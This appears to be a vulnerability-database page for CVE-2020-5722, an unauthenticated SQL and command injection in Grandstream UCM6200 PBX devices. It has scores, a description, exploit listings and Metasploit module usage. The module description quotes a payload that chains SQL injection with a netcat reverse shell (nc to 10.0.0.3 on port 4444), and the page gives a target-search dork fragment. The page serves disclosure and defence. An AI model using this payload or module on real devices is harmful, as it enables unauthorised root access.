Published: 23/03/2020 Updated: 10/02/2022

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions prior to 1.0.19.20 or inject HTML in password recovery emails in versions prior to 1.0.20.17.

Vulnerable Product	Search on Vulmon	Subscribe to Product
grandstream ucm6200_firmware

# Exploit Title: UCM6202 101813 - Remote Command Injection # Date: 2020-03-23 # Exploit Author: Jacob Baines # Vendor: wwwgrandstreamcom # Product Link: wwwgrandstreamcom/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series # Tested on: UCM6202 101813 # CVE : CVE-2020-5722 # Shodan Dork: ssl:"Grandstream" "Set-Cookie: ...

This Metasploit module exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices The vulnerabilities allow an unauthenticated remote attacker to execute commands as root ...

UCM6202 version 101813 suffers from a remote command injection vulnerability ...

This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices The vulnerabilities allow an unauthenticat ...

This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root. Exploitation happens in two stages: 1. An SQL injection during username lookup while executing the "Forgot Password" function. 2. A command injection that occurs after the user provided username is passed to a Python script via the shell. Like so: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` This module affect UCM62xx versions before firmware version 1.0.19.20.

msf > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
msf exploit(grandstream_ucm62xx_sendemail_rce) > show targets
    ...targets...
msf exploit(grandstream_ucm62xx_sendemail_rce) > set TARGET < target-id >
msf exploit(grandstream_ucm62xx_sendemail_rce) > show options
    ...show and set options...
msf exploit(grandstream_ucm62xx_sendemail_rce) > exploit

CWE-89 https://www.tenable.com/security/research/tra-2020-15 http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html https://nvd.nist.gov https://www.exploit-db.com/exploits/48247 https://www.rapid7.com/db/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce/

CVE-2020-5722

Vulnerability Summary

Vulnerability Trend

Exploits

Metasploit Modules

References

Vulmon Search

About

Products

Connect